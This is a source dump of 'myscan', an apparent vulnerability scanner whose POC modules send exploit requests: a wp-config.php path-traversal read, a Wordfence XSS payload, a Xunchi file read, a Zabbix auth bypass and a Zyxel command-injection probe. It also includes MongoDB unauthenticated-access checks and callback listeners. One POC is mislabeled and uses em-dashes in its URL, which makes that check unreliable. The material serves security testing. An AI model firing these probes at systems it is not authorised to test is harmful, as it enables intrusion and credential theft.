workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "WordPress Wordfence 7.4.6 Cross Site Scripting" 20 | self.vulmsg = "no detail" 21 | self.level = 1 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php", 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and b"DB_NAME" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/wordpress/poc_wordpress_wordfence_xss.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : poc_wordpress_wordfence_xss.py 5 | 6 | ''' 7 | 未复现 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # 
self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "WordPress Wordfence 7.4.6 Cross Site Scripting" 21 | self.vulmsg = "no detail" 22 | self.level = 1 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url + "wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E", 31 | "timeout": 10, 32 | "allow_redirects": False, 33 | "verify": False, 34 | } 35 | r = request(**req) 36 | if r != None and b"" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/xunchi/poc_xunchi-cnvd-2020-23735-file-read_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/2 3 | # @Author : caicai 4 | # @File : poc_xunchi-cnvd-2020-23735-file-read_2020.py 5 | 6 | 7 | ''' 8 | 未验证 9 | ''' 10 | 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | from myscan.lib.parse.response_parser import response_parser 14 | 15 | 16 | class POC(): 17 | def __init__(self, workdata): 18 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 19 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 20 | self.result = [] # 
此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.name = "xunchi-cnvd-2020-23735-file-read" 22 | self.vulmsg = "link : https://www.cnvd.org.cn/flaw/show/2025171" 23 | self.level = 2 # 0:Low 1:Medium 2:High 24 | 25 | def verify(self): 26 | # 根据config.py 配置的深度,限定一下目录深度 27 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 28 | return 29 | 30 | req = { 31 | "url": self.url + "backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php", 32 | "method": "GET", 33 | "headers": { 34 | "Accept-Encoding": "deflate"}, 35 | "verify": False, 36 | "timeout": 10, 37 | } 38 | r = request(**req) 39 | if r is not None and r.status_code == 200 and b"NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" in r.content and b"display_errors" in r.content: 40 | parse = response_parser(r) 41 | self.result.append({ 42 | "name": self.name, 43 | "url": self.url, 44 | "level": self.level, # 0:Low 1:Medium 2:High 45 | "detail": { 46 | "vulmsg": self.vulmsg, 47 | "request": parse.getrequestraw(), 48 | "response": parse.getresponseraw(), 49 | } 50 | }) 51 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zabbix/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zabbix/poc_zabbix_authentication-bypass_2016.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-08 3 | # @Author : caicai 4 | # @File : poc_zabbix_authentication-bypass_2016.py 5 | 6 | from myscan.lib.core.common import getmd5, get_random_num 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 
修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "zabbix_authentication-bypass" 18 | self.vulmsg = "未授权访问" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "zabbix.php?action=dashboard.view&dashboardid=1", 28 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 29 | "timeout": 10, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"Dashboard" in r.content and b"title=\"Zabbix Share\"" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": parser_.geturl(), 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zeroshell/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/27 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/zyxel/poc_zyxel_cve-2020-9054_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/4 3 | # 
@Author : caicai 4 | # @File : poc_zyxel_cve-2020-9054_2020.py 5 | 6 | 7 | ''' 8 | 未验证 9 | ''' 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "zyxel_cve-2020-9054_2020" 21 | self.vulmsg = "google it" 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | 29 | req = { 30 | "method": "GET", 31 | "url": self.url + "cgi-bin/weblogin.cgi?username=admin';echo $((1+1787568))", 32 | "timeout": 10, 33 | "verify": False, 34 | "allow_redirects": False 35 | 36 | } 37 | r = request(**req) 38 | if r is not None and b"1787569" in r.content: 39 | parser_ = response_parser(r) 40 | self.result.append({ 41 | "name": self.name, 42 | "url": parser_.geturl(), 43 | "level": self.level, # 0:Low 1:Medium 2:High 44 | "detail": { 45 | "vulmsg": self.vulmsg, 46 | "request": parser_.getrequestraw(), 47 | "response": parser_.getresponseraw() 48 | } 49 | }) 50 | -------------------------------------------------------------------------------- /myscan/pocs/perscheme/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-13 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- /myscan/pocs/perscheme/__template.py: 
-------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | 7 | #此脚本为编写perscheme的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 8 | 9 | 10 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 11 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 12 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 13 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 14 | 15 | 16 | class POC(): 17 | def __init__(self, workdata): 18 | self.dictdata = workdata.get("dictdata") #python的dict数据,详情请看docs/开发指南Example dict数据示例 19 | #scheme的poc不同perfoler和perfile,没有workdata没有data字段,所以无self.url 20 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.name = "your poc name" 22 | self.vulmsg="your poc detail msg" 23 | self.level = 1 # 0:Low 1:Medium 2:High 24 | 25 | def verify(self): 26 | pass 27 | self.result.append({ 28 | "name": self.name, 29 | "url": "http://example.com/test.php", 30 | "level": self.level, # 0:Low 1:Medium 2:High 31 | "detail": { 32 | "vulmsg": self.vulmsg, 33 | } 34 | }) -------------------------------------------------------------------------------- /myscan/pocs/perscheme/info/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/28 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perscheme/others_webdav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-03-26 3 | # @Author : caicai 4 | # @File : others_webdav.py 5 | 6 | from myscan.lib.parse.dictdata_parser import 
dictdata_parser # 写了一些操作dictdata的方法的类 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 10 | 11 | ''' 12 | 根据headers包含Translate:、If:、Lock-Token 其中一种便认为为webdav, 13 | ''' 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") #python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | #scheme的poc不同perfoler和perfile,没有workdata没有data字段,所以无self.url 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "发现webdav" 20 | self.vulmsg="探测到开放Webdav,可进行Webdav相关测试" 21 | self.level = 0 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | keys=["translate","if","lock-token"] 25 | parser=dictdata_parser(self.dictdata) 26 | for k,v in self.dictdata.get("request").get("headers").items(): 27 | if k.lower() in keys: 28 | self.result.append({ 29 | "name": self.name, 30 | "url": parser.getfilepath(), 31 | "level": self.level, # 0:Low 1:Medium 2:High 32 | "detail": { 33 | "request":parser.getrequestraw(), 34 | "response":parser.getresponseraw(), 35 | "vulmsg": self.vulmsg, 36 | } 37 | }) 38 | break -------------------------------------------------------------------------------- /myscan/pocs/perscheme/poc_apereo_cas_rce_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/12/25 3 | # @Author : caicai 4 | # @File : poc_apereo_cas_rce_2019.py 5 | 6 | ''' 7 | 被动触发 8 | ''' 9 | 10 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 11 | from myscan.pocs.perfolder.apereo.poc_apereo_cas_rce_2019 import POC as mypoc 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.workdata = workdata 17 | self.dictdata = 
workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | # scheme的poc不同perfoler和perfile,没有workdata没有data字段,所以无self.url 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "apereo_cas_rce" 21 | self.vulmsg = "detail: https://github.com/vulhub/vulhub/blob/master/apereo-cas/4.1-rce/README.zh-cn.md" 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 添加限定条件 26 | if self.dictdata.get("request").get("method").lower() != "post": 27 | return 28 | self.parser = dictdata_parser(self.dictdata) 29 | if b"<=LT-" in self.parser.getrequestbody(): 30 | poc = mypoc(self.workdata) 31 | poc.verify() 32 | self.result = poc.result 33 | -------------------------------------------------------------------------------- /myscan/pocs/perscheme/shiro/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/12/14 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perserver/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/pocs/perserver/__template.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-07-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | 7 | # 此脚本为编写perserver的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 8 | 9 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 10 | from myscan.lib.hostscan.pocbase import PocBase 11 | from myscan.lib.core.data import paths, cmd_line_options 12 | from myscan.lib.hostscan.common import get_data_from_file 13 | from myscan.lib.core.threads import mythread 14 | import os, socket 
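class POC(PocBase):
    """Template for a perserver (host-scan) check; copy it and fill in verify().

    ``self.dictdata`` holds the host record (see Class3-hostscan开发指南.md);
    ``self.require`` is the service/type rule that ``check_rule`` evaluates
    before anything is sent. Findings go to ``self.result`` as dicts with
    name, url, level and detail (detail itself a dict).
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # plain dict for this host, see Class3-hostscan开发指南.md
        self.result = []  # findings: dicts with name, url, level and detail (detail itself a dict), see verify()
        self.addr = self.dictdata.get("addr")  # type:str
        self.port = self.dictdata.get("port")  # type:int
        # Fill in the fields below for the real check.
        self.name = "your poc name "
        self.vulmsg = "your poc vulmsg"
        self.level = 0  # 0:Low 1:Medium 2:High
        self.require = {
            "service": ["redis"],
            "type": "tcp"
        }
        # Custom parameters go here.

    def verify(self):
        """Run the check; the template only records a sample finding."""
        if not self.check_rule(self.dictdata, self.require):  # skip unless the service/type rule matches
            return

        self.result.append({
            "name": self.name,
            "url": "tcp://{}:{}".format(self.addr, self.port),
            "level": self.level,  # 0:Low 1:Medium 2:High
            "detail": {
                "vulmsg": self.vulmsg,
            }
        })

--------------------------------------------------------------------------------
/myscan/pocs/perserver/mongodb_unauth.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/7/27
# @Author : caicai
# @File : mongodb_unauth.py


from myscan.lib.hostscan.pocbase import PocBase
import pymongo


class POC(PocBase):
    """Perserver check for MongoDB reachable without authentication.

    Connects to ``addr:port`` with no credentials and calls
    ``list_database_names()``; a non-empty list is reported as a finding whose
    detail carries the database names. Every connection/auth/timeout failure is
    treated as "not confirmed" and produces no finding.
    """

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # plain dict for this host, see Class3-hostscan开发指南.md
        self.result = []  # findings: dicts with name, url, level and detail (detail itself a dict), see verify()
        self.addr = self.dictdata.get("addr")  # type:str
        self.port = self.dictdata.get("port")  # type:int
        # Fill in the fields below for the real check.
        self.name = "mongodb_unauth"
        self.vulmsg = "unatuh access"
        self.level = 2  # 0:Low 1:Medium 2:High
        self.require = {
            # Comment as found (apparently left over from the smb check): "nmap itself
            # reports microsoft-ds; kept as a list so custom fingerprint scripts can add names".
            "service": ["mongodb"],
            "type": "tcp"
        }

    def verify(self):
        """Probe the server anonymously and record a finding if databases are listed."""
        if not self.check_rule(self.dictdata, self.require):  # skip unless the service/type rule matches
            return
        conn = None
        try:
            # Fixed: socketTimeoutMS only bounds individual socket operations. Without
            # connectTimeoutMS/serverSelectionTimeoutMS an unreachable or filtered port
            # leaves the worker blocked for pymongo's default (30 s) server selection.
            conn = pymongo.MongoClient(
                self.addr, self.port,
                socketTimeoutMS=3000,
                connectTimeoutMS=3000,
                serverSelectionTimeoutMS=3000,
            )
            dbname = conn.list_database_names()
            if dbname:
                self.result.append({
                    "name": self.name,
                    "url": "tcp://{}:{}".format(self.addr, self.port),
                    "level": self.level,  # 0:Low 1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "dbname": str(dbname)
                    }
                })
        except Exception:
            # Best-effort probe: refused, auth-required and timed-out all mean
            # "not confirmed", so they are deliberately not reported.
            pass
        finally:
            # Fixed: the client was never closed, leaking its connection pool and
            # monitor thread for every scanned host.
            if conn is not None:
                conn.close()

--------------------------------------------------------------------------------
/myscan/pocs/perserver/rmi_deserialization.py:
--------------------------------------------------------------------------------
# !/usr/bin/env python3
# @Time : 2020/7/15
# @Author : caicai
# @File : rmi_deserialization.py


from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send  # socket helpers, if needed
from myscan.lib.hostscan.pocbase import PocBase
from myscan.lib.core.data import paths, cmd_line_options
from myscan.lib.hostscan.common import get_data_from_file
from myscan.lib.core.threads import mythread
import os, socket


class POC(PocBase):
    """Placeholder perserver check for RMI deserialization; verify() is not implemented yet."""

    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # plain dict for this host, see Class3-hostscan开发指南.md
        self.result = []  # findings: dicts with name, url, level and detail (detail itself a dict), see verify()
        self.addr = self.dictdata.get("addr")  # type:str
        self.port = self.dictdata.get("port")  # type:int
        # Fill in the fields below for the real check.
        self.name = "rmi_deserialization"
        self.vulmsg = "enum gadget"
        self.level = 0  # 0:Low 1:Medium 2:High
        self.require = {
            "service": ["rmi"],
            "type": "tcp"
        }
        # Custom parameters go here.

    def verify(self):
        """Not implemented: returns before sending anything; the append below is unreachable."""
        if not self.check_rule(self.dictdata, self.require):  # skip unless the service/type rule matches
            return
        # Not implemented yet.
        return
        self.result.append({
            "name": self.name,
            "url":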
"tcp://{}:{}".format(self.addr, self.port), 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | } 43 | }) 44 | -------------------------------------------------------------------------------- /myscan/pocs/perserver/smb_info.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/14 3 | # @Author : caicai 4 | # @File : smb_info.py 5 | 6 | 7 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 8 | from myscan.lib.hostscan.pocbase import PocBase 9 | from myscan.lib.core.data import paths, cmd_line_options 10 | from myscan.lib.hostscan.common import get_data_from_file 11 | from myscan.lib.core.threads import mythread 12 | import os, socket 13 | 14 | 15 | class POC(PocBase): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详见 Class3-hostscan开发指南.md 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.addr = self.dictdata.get("addr") # type:str 20 | self.port = self.dictdata.get("port") # type:int 21 | # 以下根据实际情况填写 22 | self.name = "smb_info" 23 | self.vulmsg = "smb_info leak." 
# … continuation of smb_info.py POC.__init__(), started on the previous line.
        self.level = 0  # 0:Low 1:Medium 2:High
        self.require = {
            "service": ["smb", "samba", "microsoft-ds"],
            "type": "tcp"
        }
        # Custom parameters go here.

    def verify(self):
        # Not implemented: the second ``return`` makes everything after it dead code.
        if not self.check_rule(self.dictdata, self.require):  # skip unless the service/type rule matches
            return
        return
        # Not implemented yet.
        #
        # self.result.append({
        # "name": self.name,
        # "url": "tcp://{}:{}".format(self.addr, self.port),
        # "level": self.level, # 0:Low 1:Medium 2:High
        # "detail": {
        # "vulmsg": self.vulmsg,
        # }
        # })

--------------------------------------------------------------------------------
/myscan/reverse/reverse.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# @Time : 2020-02-23
# @Author : caicai
# @File : reverse.py
import sys

from myscan.lib.core.data import logger, cmd_line_options
from myscan.config import reverse_set
from myscan.lib.core.common import get_random_str
from myscan.reverse.reverse_http import http_start
from myscan.reverse.reverse_dns import dns_start
from myscan.reverse.reverse_rmi import rmi_start
from myscan.reverse.reverse_ldap import ldap_start
from myscan.lib.core.common_reverse import init_db
from multiprocessing import Process


def reverse_start() -> None:
    """Start the out-of-band callback ("reverse") listeners.

    Listener addresses come from ``reverse_set``. If no ``secret_key`` is
    configured, a random 9-character key from ``get_random_str`` is used and
    passed to the HTTP server. HTTP, RMI and LDAP run in daemon child processes
    (they die with this process); ``dns_start()`` runs in the calling process.
    Any exception raised outside the inner block is logged and ends the
    process via ``sys.exit()``.
    """
    try:
        secret_key = reverse_set.get("secret_key")
        if not secret_key:
            # NOTE(review): this key is what the HTTP callback server is started with
            # below; confirm get_random_str draws from a CSPRNG (secrets/os.urandom) — TODO.
            secret_key = get_random_str(9)
        # The key is written to the log at INFO, so whoever can read the scanner's
        # log can read the key.
        logger.info("Reverse http server: http://{}:{} secret_key: {}".format(reverse_set.get("reverse_http_ip"),
                                                                               reverse_set.get("reverse_http_port"),
                                                                               secret_key))
        logger.info("Reverse dns server: {}".format(reverse_set.get("reverse_domain")))
        logger.info("Reverse rmi server: {}:{}".format(reverse_set.get("reverse_rmi_ip"),reverse_set.get("reverse_rmi_port")))
        logger.info("Reverse ldap server: {}:{}".format(reverse_set.get("reverse_ldap_ip"),reverse_set.get("reverse_ldap_port")))

        init_db()
        try:
            # daemon=True: the children are terminated when this process exits.
            p = Process(target=http_start,args=(secret_key,))
            p.daemon = True
            p.start()
            p1 = Process(target=rmi_start)
            p1.daemon = True
            p1.start()
            p2 = Process(target=ldap_start)
            p2.daemon = True
            p2.start()
            # Runs in this process; presumably blocks until interrupted — cannot be
            # confirmed from here.
            dns_start()
        except KeyboardInterrupt as ex:
            # ``ex`` is unused; Ctrl+C is swallowed here and reverse_start returns normally.
            logger.warning("Ctrl+C was pressed ,aborted program")
    except Exception as ex:
        logger.warning("Start reverse get error:{}".format(ex))
        sys.exit()

--------------------------------------------------------------------------------
/myscan/tests/TODO:
--------------------------------------------------------------------------------
2.布尔盲注去除图片后缀 OK
3.支持--clean单独参数
4.继承类 ok
5.burp jar 输出url ok
6.iis 短文件名优化
7.反连平台支持ldap ok
8.burp jar 右键检测优化,支持去重。ok
9.poc 超时 ok
10.sql error 误报 多进程处理,无法修改
12。全局变量超时,考虑????notok ,sql注入需要特定时间。

13.phpstudy 目录问题
14.php CVE-2019-11043 https://github.com/jas502n/CVE-2019-11043/blob/master/php-rce-check.py
15.
-------------------------------------------------------------------------------- /myscan/tests/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/10/29 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | 6 | ''' 7 | 8 | you can ignore this folder 9 | ''' -------------------------------------------------------------------------------- /myscan/tests/codetest.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/tests/codetest.py -------------------------------------------------------------------------------- /myscan/tests/es_test.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/1 3 | # @Author : caicai 4 | # @File : es_test.py 5 | 6 | from elasticsearch_dsl import Search 7 | from elasticsearch_dsl.connections import connections 8 | from elasticsearch import helpers 9 | 10 | client = connections.create_connection(hosts=['127.0.0.1:9200'], 11 | http_auth=('',''), timeout=10) 12 | info=client.info() 13 | if "You Know, for Search" in str(info): 14 | if int(info.get("version").get("number").replace(".",""))>700: 15 | action = { 16 | "_index": "burpdata", 17 | "_id": "111111", 18 | "_source": {"a":1} 19 | } 20 | client.indices.exists("httpinfo") 21 | helpers.bulk(client, [action]) 22 | -------------------------------------------------------------------------------- /myscan/tests/getdatafromredis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-09 3 | # @Author : caicai 4 | # @File : getdatafromredis.py 5 | 6 | import redis, json 7 | r = redis.Redis(db=0) 8 | res = r.lpop("burpdata") 9 | if res: 10 | print(json.dumps(json.loads(res),indent=3)) 11 | 
-------------------------------------------------------------------------------- /myscan/tests/ignore_test.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/19 3 | # @Author : caicai 4 | # @File : ignore_test.py 5 | import socket 6 | import urllib3 7 | import requests 8 | 9 | USE_IPV6 = True 10 | 11 | 12 | def allowed_gai_family(): 13 | family = socket.AF_INET 14 | if USE_IPV6: 15 | family = socket.AF_UNSPEC 16 | return family 17 | 18 | 19 | urllib3.util.connection.allowed_gai_family = allowed_gai_family 20 | 21 | r=requests.get("http://www.qq.com/",proxies={"http":"http://127.0.0.1:8080"},allow_redirects=True) 22 | print(r.status_code) 23 | -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff 
-------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/web/static/bugs/bootstrap/fonts/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /myscan/web/static/bugs/bootstrap/js/npm.js: -------------------------------------------------------------------------------- 1 | // This file is autogenerated via the `commonjs` Grunt task. You can require() this file in a CommonJS environment. 2 | require('../../js/transition.js') 3 | require('../../js/alert.js') 4 | require('../../js/button.js') 5 | require('../../js/carousel.js') 6 | require('../../js/collapse.js') 7 | require('../../js/dropdown.js') 8 | require('../../js/modal.js') 9 | require('../../js/tooltip.js') 10 | require('../../js/popover.js') 11 | require('../../js/scrollspy.js') 12 | require('../../js/tab.js') 13 | require('../../js/affix.js') -------------------------------------------------------------------------------- /myscan/web/static/css/prism.min.css: -------------------------------------------------------------------------------- 1 | code[class*="language-"],pre[class*="language-"]{color:black;text-shadow:0 1px white;font-family:Consolas,Monaco,'Andale Mono',monospace;direction:ltr;text-align:left;white-space:pre;word-spacing:normal;word-break:normal;line-height:1.5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-hyphens:none;-moz-hyphens:none;-ms-hyphens:none;hyphens:none}pre[class*="language-"]::-moz-selection,pre[class*="language-"] ::-moz-selection,code[class*="language-"]::-moz-selection,code[class*="language-"] ::-moz-selection{text-shadow:none;background:#b3d4fc}pre[class*="language-"]::selection,pre[class*="language-"] 
